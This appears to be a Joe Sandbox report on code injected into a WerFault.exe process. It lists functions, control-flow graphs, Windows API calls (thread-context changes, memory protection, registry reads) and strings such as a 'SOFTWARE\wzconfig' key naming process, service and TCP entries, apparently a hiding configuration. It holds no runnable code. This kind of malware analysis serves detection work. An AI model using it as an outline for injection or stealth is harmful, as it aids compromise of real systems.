265b3c0a07c 4 API calls 8950->8952 8951->8950 8953 265b3c0b2bf 8952->8953 8953->8954 8955 265b3c0a068 Is_bad_exception_allowed 4 API calls 8953->8955 8956 265b3c0b2d8 8953->8956 8954->8916 8955->8956 8957 265b3c0a07c 4 API calls 8956->8957 8957->8954 8959 265b3c0aa59 __FrameHandler3::FrameUnwindToEmptyState 8958->8959 8960 265b3c0a068 Is_bad_exception_allowed 4 API calls 8959->8960 8961 265b3c0aa91 8960->8961 8962 265b3c09ed4 3 API calls 8961->8962 8963 265b3c0aad5 8962->8963 8963->8916 8965 265b3c09c54 __FrameHandler3::ExecutionInCatch 8964->8965 8966 265b3c09bdc __FrameHandler3::ExecutionInCatch 4 API calls 8965->8966 8967 265b3c09c5e 8966->8967 8967->8890 8969 265b3c07950 _log10_special 2 API calls 8968->8969 8970 265b3c09fce 8969->8970 8970->8913 8972 265b3c0aff9 8971->8972 8976 265b3c0b20c 8971->8976 8973 265b3c08c04 _CallSETranslator 4 API calls 8972->8973 8974 265b3c0affe 8973->8974 8975 265b3c0b01d EncodePointer 8974->8975 8982 265b3c0b070 8974->8982 8977 265b3c08c04 _CallSETranslator 4 API calls 8975->8977 8976->8913 8978 265b3c0b02d 8977->8978 8978->8982 8983 265b3c09b88 8978->8983 8980 265b3c0a068 LoadLibraryExW LoadLibraryExW FreeLibrary TlsSetValue Is_bad_exception_allowed 8980->8982 8981 265b3c0aa1c 7 API calls 8981->8982 8982->8976 8982->8980 8982->8981 8984 265b3c08c04 _CallSETranslator 4 API calls 8983->8984 8985 265b3c09bb4 8984->8985 8985->8982 10056 265b3c03bf0 10060 265b3c03b3d 10056->10060 10057 265b3c03ba7 10058 265b3c03b8d VirtualQuery 10058->10057 10058->10060 10059 265b3c03bf2 GetLastError 10059->10060 10060->10057 10060->10058 10060->10059 9211 265b3c108f8 9212 265b3c10903 9211->9212 9220 265b3c131f8 9212->9220 9214 265b3c10908 9229 265b3c132ac 9214->9229 9217 265b3c10939 9218 265b3c0dcb4 __free_lconv_num 7 API calls 9217->9218 9219 265b3c10945 9218->9219 9221 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9220->9221 9222 265b3c13211 9221->9222 9223 265b3c13291 9222->9223 9226 265b3c1325c DeleteCriticalSection 9222->9226 9233 265b3c13a6c 9222->9233 9224 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 9223->9224 9225 265b3c1329b 9224->9225 9225->9214 9227 265b3c0dcb4 __free_lconv_num 7 API calls 9226->9227 9227->9222 9230 265b3c1091a DeleteCriticalSection 9229->9230 9231 265b3c132c0 9229->9231 9230->9214 9230->9217 9231->9230 9232 265b3c0dcb4 __free_lconv_num 7 API calls 9231->9232 9232->9230 9234 265b3c13a9c 9233->9234 9241 265b3c13948 9234->9241 9236 265b3c13ab5 9237 265b3c13ada 9236->9237 9238 265b3c0cd10 _invalid_parameter_noinfo 20 API calls 9236->9238 9239 265b3c13aef 9237->9239 9240 265b3c0cd10 _invalid_parameter_noinfo 20 API calls 9237->9240 9238->9237 9239->9222 9240->9239 9242 265b3c13991 9241->9242 9243 265b3c13963 9241->9243 9245 265b3c13983 9242->9245 9251 265b3c10954 EnterCriticalSection 9242->9251 9244 265b3c0da14 _invalid_parameter_noinfo 20 API calls 9243->9244 9244->9245 9245->9236 9252 265b3c16240 9251->9252 9253 265b3c0cafc 9254 265b3c0cb2d 9253->9254 9255 265b3c0cb15 9253->9255 9255->9254 9256 265b3c0dcb4 __free_lconv_num 7 API calls 9255->9256 9256->9254 10061 265b3c0fffc 10062 265b3c10008 10061->10062 10064 265b3c1002f 10062->10064 10065 265b3c1222c 10062->10065 10066 265b3c12231 10065->10066 10070 265b3c1226c 10065->10070 10067 265b3c12252 DeleteCriticalSection 10066->10067 10068 265b3c12264 10066->10068 10067->10067 10067->10068 10069 265b3c0dcb4 __free_lconv_num 7 API calls 10068->10069 10069->10070 10070->10062 9257 265b3c15cfd 9258 265b3c0a014 __CxxCallCatchBlock 4 API calls 9257->9258 9260 265b3c15d10 9258->9260 9259 265b3c08c04 _CallSETranslator 4 API calls 9261 265b3c15d63 9259->9261 9263 265b3c088d8 __CxxCallCatchBlock 4 API calls 9260->9263 9265 265b3c15d4f __CxxCallCatchBlock 9260->9265 9262 265b3c08c04 _CallSETranslator 4 API calls 9261->9262 9264 265b3c15d73 9262->9264 9263->9265 9265->9259 9266 265b3c05d00 9267 265b3c05d0d 9266->9267 9268 265b3c05d19 9267->9268 9274 265b3c05e2a 9267->9274 9269 265b3c05d9d 9268->9269 9270 265b3c05d76 SetThreadContext 9268->9270 9270->9269 9271 265b3c05f0e 9273 265b3c05f2e 9271->9273 9276 265b3c043f0 VirtualFree 9271->9276 9272 265b3c05e51 VirtualProtect FlushInstructionCache 9272->9274 9275 265b3c04e00 3 API calls 9273->9275 9274->9271 9274->9272 9279 265b3c05f33 9275->9279 9276->9273 9277 265b3c05f87 9280 265b3c07950 _log10_special 2 API calls 9277->9280 9278 265b3c05f47 ResumeThread 9278->9279 9279->9277 9279->9278 9281 265b3c05fcf 9280->9281 8986 265b3c15d83 8989 265b3c0892c 8986->8989 8990 265b3c08956 8989->8990 8991 265b3c08944 8989->8991 8992 265b3c08c04 _CallSETranslator 4 API calls 8990->8992 8991->8990 8993 265b3c0894c 8991->8993 8994 265b3c0895b 8992->8994 8995 265b3c08954 8993->8995 8996 265b3c08c04 _CallSETranslator 4 API calls 8993->8996 8994->8995 8997 265b3c08c04 _CallSETranslator 4 API calls 8994->8997 8998 265b3c0897b 8996->8998 8997->8995 8999 265b3c08c04 _CallSETranslator 4 API calls 8998->8999 9000 265b3c08988 8999->9000 9001 265b3c0cc18 17 API calls 9000->9001 9002 265b3c08991 9001->9002 9003 265b3c0cc18 17 API calls 9002->9003 9004 265b3c0899d 9003->9004

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00000265B3C02544 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 5 265b3c02544-265b3c025c8 call 265b3c22d30 8 265b3c027ec-265b3c0280f 5->8 9 265b3c025ce-265b3c025d1 5->9 9->8 10 265b3c025d7-265b3c025e5 9->10 10->8 11 265b3c025eb-265b3c02631 call 265b3c15730 * 3 GetFileType 10->11 18 265b3c02649-265b3c02653 call 265b3c01a48 11->18 19 265b3c02633-265b3c02647 StrCpyW 11->19 20 265b3c02658-265b3c0265c 18->20 19->20 22 265b3c02749-265b3c02762 call 265b3c030bc call 265b3c03858 20->22 23 265b3c02662-265b3c02667 20->23 37 265b3c026f9-265b3c02743 call 265b3c22d30 22->37 38 265b3c02764-265b3c02793 call 265b3c030bc call 265b3c03058 call 265b3c01cb4 22->38 24 265b3c0266a-265b3c0266f 23->24 26 265b3c0268c 24->26 27 265b3c02671-265b3c02674 24->27 30 265b3c0268f-265b3c026a8 call 265b3c030bc call 265b3c03858 26->30 27->26 29 265b3c02676-265b3c02679 27->29 29->26 32 265b3c0267b-265b3c0267e 29->32 47 265b3c0279b-265b3c0279d 30->47 48 265b3c026ae-265b3c026dd call 265b3c030bc call 265b3c03058 call 265b3c01cb4 30->48 32->26 35 265b3c02680-265b3c02683 32->35 35->26 39 265b3c02685-265b3c0268a 35->39 37->8 37->22 38->37 62 265b3c02799 38->62 39->26 39->30 50 265b3c027be-265b3c027c1 47->50 51 265b3c0279f-265b3c027b9 47->51 48->47 68 265b3c026e3-265b3c026ee 48->68 54 265b3c027cb-265b3c027ce 50->54 55 265b3c027c3-265b3c027c9 50->55 51->24 58 265b3c027e9 54->58 59 265b3c027d0-265b3c027d3 54->59 55->8 58->8 59->58 63 265b3c027d5-265b3c027d8 59->63 62->8 63->58 65 265b3c027da-265b3c027dd 63->65 65->58 67 265b3c027df-265b3c027e2 65->67 67->58 69 265b3c027e4-265b3c027e7 67->69 68->24 70 265b3c026f4 68->70 69->8 69->58 70->8
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction ID: 2ba398b339b45d7998adf309d3898cc53a72a4c5bdb966db2cc6ff8b88e6702c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D71B536200FF185EB76DFA9D8483AA67A4FB8978CF51015ADE4963B8DDE36C504CB00
                                                                                                                                                                                                                                                Function 00000265B3C02034 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 162COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 89 265b3c02034-265b3c0205f call 265b3c22d70 91 265b3c02065-265b3c0206e 89->91 92 265b3c02077-265b3c0207a 91->92 93 265b3c02070-265b3c02074 91->93 94 265b3c0222b-265b3c0224b 92->94 95 265b3c02080-265b3c02083 92->95 93->92 96 265b3c02089-265b3c0209b 95->96 97 265b3c0217b-265b3c0217e 95->97 96->94 98 265b3c020a1-265b3c020ad 96->98 99 265b3c021ef-265b3c021f2 97->99 100 265b3c02180-265b3c0219a call 265b3c02f18 97->100 101 265b3c020db-265b3c020e6 call 265b3c01bc4 98->101 102 265b3c020af-265b3c020bf 98->102 99->94 103 265b3c021f4-265b3c02207 call 265b3c02f18 99->103 100->94 112 265b3c021a0-265b3c021b6 100->112 109 265b3c02107-265b3c02119 101->109 114 265b3c020e8-265b3c02100 call 265b3c01bfc 101->114 102->101 105 265b3c020c1-265b3c020d9 StrCmpNIW 102->105 103->94 113 265b3c02209-265b3c02211 103->113 105->101 105->109 115 265b3c02129-265b3c0212b 109->115 116 265b3c0211b-265b3c0211d 109->116 112->94 117 265b3c021b8-265b3c021d4 112->117 113->94 118 265b3c02213-265b3c0221b 113->118 114->109 131 265b3c02102-265b3c02105 114->131 122 265b3c0212d-265b3c02130 115->122 123 265b3c02132 115->123 120 265b3c0211f-265b3c02122 116->120 121 265b3c02124-265b3c02127 116->121 124 265b3c021d8-265b3c021eb 117->124 127 265b3c0221e-265b3c02229 118->127 125 265b3c02135-265b3c02138 120->125 121->125 122->125 123->125 124->124 126 265b3c021ed 124->126 129 265b3c02146-265b3c02149 125->129 130 265b3c0213a-265b3c02140 125->130 126->94 127->94 127->127 129->94 132 265b3c0214f-265b3c02153 129->132 130->98 130->129 131->125 133 265b3c02155-265b3c02158 132->133 134 265b3c0216a-265b3c02176 132->134 133->94 135 265b3c0215e-265b3c02163 133->135 134->94 135->132 136 265b3c02165 135->136 136->94
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID: S
                                                                                                                                                                                                                                                • API String ID: 756756679-543223747
                                                                                                                                                                                                                                                • Opcode ID: 2c414ab3eb2c8f5067fa8ace7f17c5c48379fbe6073c257fbef930be96b73639
                                                                                                                                                                                                                                                • Instruction ID: 9c3f8332a60ebf985cc474ae06c79972bdb1bc4406ddc56b9a3991ca9a897db0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c414ab3eb2c8f5067fa8ace7f17c5c48379fbe6073c257fbef930be96b73639
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47519D32B10FB496EB62CFA5E8487A963A5FB0879CF059455DF0532B88DB37D852CB00
                                                                                                                                                                                                                                                Function 00000265B3C01A48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                                                                                • String ID: \\?\
                                                                                                                                                                                                                                                • API String ID: 2719912262-4282027825
                                                                                                                                                                                                                                                • Opcode ID: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction ID: 0c7a8631214e96392f24a95b004fad989cc9cb6eb6f63dfd97988b1d3db6559d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BF0A432300EA092E7608BA0F4D8759A360FB44B8CF944024DE495255DDF7EC69CCF00
                                                                                                                                                                                                                                                Function 00000265B3C032A0 Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1683269324-0
                                                                                                                                                                                                                                                • Opcode ID: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction ID: 09a4bb8fa8c0f197ce22017bca74e515aea01ce7267fdbcdb8f004f40148343a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D111C070710EB182FBA09BF0F98D3596290AF5470DF4881A59946A619DEF3BC046CB08
                                                                                                                                                                                                                                                Function 00000265B3C01AC4 Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: GetProcessHeap.KERNEL32 ref: 00000265B3C0163B
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: HeapAlloc.KERNEL32 ref: 00000265B3C0164A
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C016BA
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C016E7
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C01701
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C01721
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C0173C
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C0175C
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C01777
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C01797
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C017B2
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C017D2
                                                                                                                                                                                                                                                • Sleep.KERNEL32 ref: 00000265B3C01ADF
                                                                                                                                                                                                                                                • SleepEx.KERNELBASE ref: 00000265B3C01AE5
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C017ED
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C0180D
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C01828
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C01848
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C01863
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C01883
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C0189E
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C018A8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1534210851-0
                                                                                                                                                                                                                                                • Opcode ID: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction ID: 0f1713a559062cbadef8b978ef2a001b288e909bbb0b94c772f6c6a7830ed846
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 863165BD210EB141FB509BA2D948369A3A4EF44BCCF5460A19E09A77DDFF12C851CB50

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 00000265B3C02B40 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 328 265b3c02b40-265b3c02bb9 call 265b3c22d50 331 265b3c02bbf-265b3c02bc5 328->331 332 265b3c02ef4-265b3c02f17 328->332 331->332 333 265b3c02bcb-265b3c02bce 331->333 333->332 334 265b3c02bd4-265b3c02bd7 333->334 334->332 335 265b3c02bdd-265b3c02bed GetModuleHandleA 334->335 336 265b3c02bef-265b3c02bff call 265b3c16090 335->336 337 265b3c02c01 335->337 339 265b3c02c04-265b3c02c22 336->339 337->339 339->332 342 265b3c02c28-265b3c02c47 StrCmpNIW 339->342 342->332 343 265b3c02c4d-265b3c02c51 342->343 343->332 344 265b3c02c57-265b3c02c61 343->344 344->332 345 265b3c02c67-265b3c02c6e 344->345 345->332 346 265b3c02c74-265b3c02c87 345->346 347 265b3c02c97 346->347 348 265b3c02c89-265b3c02c95 346->348 349 265b3c02c9a-265b3c02c9e 347->349 348->349 350 265b3c02cae 349->350 351 265b3c02ca0-265b3c02cac 349->351 352 265b3c02cb1-265b3c02cbb 350->352 351->352 353 265b3c02db1-265b3c02db5 352->353 354 265b3c02cc1-265b3c02cc4 352->354 355 265b3c02ee6-265b3c02eee 353->355 356 265b3c02dbb-265b3c02dbe 353->356 357 265b3c02cd6-265b3c02ce0 354->357 358 265b3c02cc6-265b3c02cd3 call 265b3c019a4 354->358 355->332 355->346 361 265b3c02dcf-265b3c02dd9 356->361 362 265b3c02dc0-265b3c02dcc call 265b3c019a4 356->362 359 265b3c02ce2-265b3c02cef 357->359 360 265b3c02d14-265b3c02d1e 357->360 358->357 359->360 365 265b3c02cf1-265b3c02cfe 359->365 366 265b3c02d4e-265b3c02d51 360->366 367 265b3c02d20-265b3c02d2d 360->367 369 265b3c02e09-265b3c02e0c 361->369 370 265b3c02ddb-265b3c02de8 361->370 362->361 373 265b3c02d01-265b3c02d07 365->373 375 265b3c02d5f-265b3c02d6c lstrlenW 366->375 376 265b3c02d53-265b3c02d5d call 265b3c01bc4 366->376 367->366 374 265b3c02d2f-265b3c02d3c 367->374 371 265b3c02e19-265b3c02e26 lstrlenW 369->371 372 265b3c02e0e-265b3c02e17 call 265b3c01bc4 369->372 370->369 378 265b3c02dea-265b3c02df7 370->378 385 265b3c02e28-265b3c02e32 371->385 386 265b3c02e49-265b3c02e53 call 265b3c03858 371->386 372->371 390 265b3c02e5e-265b3c02e69 372->390 383 265b3c02da7-265b3c02dac 373->383 384 265b3c02d0d-265b3c02d12 373->384 387 265b3c02d3f-265b3c02d45 374->387 379 265b3c02d6e-265b3c02d78 375->379 380 265b3c02d8f-265b3c02da1 call 265b3c03858 375->380 376->375 376->383 381 265b3c02dfa-265b3c02e00 378->381 379->380 389 265b3c02d7a-265b3c02d8d call 265b3c01534 379->389 380->383 394 265b3c02e56-265b3c02e58 380->394 381->390 391 265b3c02e02-265b3c02e07 381->391 383->394 384->360 384->373 385->386 395 265b3c02e34-265b3c02e47 call 265b3c01534 385->395 386->394 387->383 396 265b3c02d47-265b3c02d4c 387->396 389->380 389->383 399 265b3c02e6b-265b3c02e6f 390->399 400 265b3c02ee0-265b3c02ee4 390->400 391->369 391->381 394->355 394->390 395->386 395->390 396->366 396->387 405 265b3c02e77-265b3c02e91 call 265b3c15090 399->405 406 265b3c02e71-265b3c02e75 399->406 400->355 409 265b3c02e94-265b3c02e97 405->409 406->405 406->409 412 265b3c02e99-265b3c02eb7 call 265b3c15090 409->412 413 265b3c02eba-265b3c02ebd 409->413 412->413 413->400 415 265b3c02ebf-265b3c02edd call 265b3c15090 413->415 415->400
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                                                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                                                                                • API String ID: 2119608203-3850299575
                                                                                                                                                                                                                                                • Opcode ID: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction ID: b57eab705e623fc815f16bb7541ddbe1a27266721628a3fa6c3c5d7b099dc802
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DB17D72210EF082EBAADFA5D4487A9A3A5FF44B8CF545056DE1963B9CDB36CD40CB40
                                                                                                                                                                                                                                                Function 00000265B3C07D90 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction ID: 7ade3d21502b40c3853907b7560cdc77ebab1c4db81e543031cef8de330e69e9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD318276315FA09AEB648FA0E8443ED7360FB84708F54402ADB4E57B98EF39C648CB10
                                                                                                                                                                                                                                                Function 00000265B3C0D814 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction ID: 52aa95433d79f49b5bf5707deb9ca7d3a2d09c136826a57d0b63d9da71eebdaa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7331B136214FA086EB60CF65E84839E73A0FB89758F600126EE9D53BADDF39C555CB00
                                                                                                                                                                                                                                                Function 00000265B3C01630 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                                                                                                                • String ID: SOFTWARE\wzconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                                                                                                                • API String ID: 106492572-440640706
                                                                                                                                                                                                                                                • Opcode ID: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
                                                                                                                                                                                                                                                • Instruction ID: 4cf1d601b45d8cfd585966c7894cdb11d489de46f83f5635d0ac97c3bb9e9834
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16712A3A310E7086EB10DFA6E88869963A4FF84B8CF112111DE8E67B6DDF3AC554C744
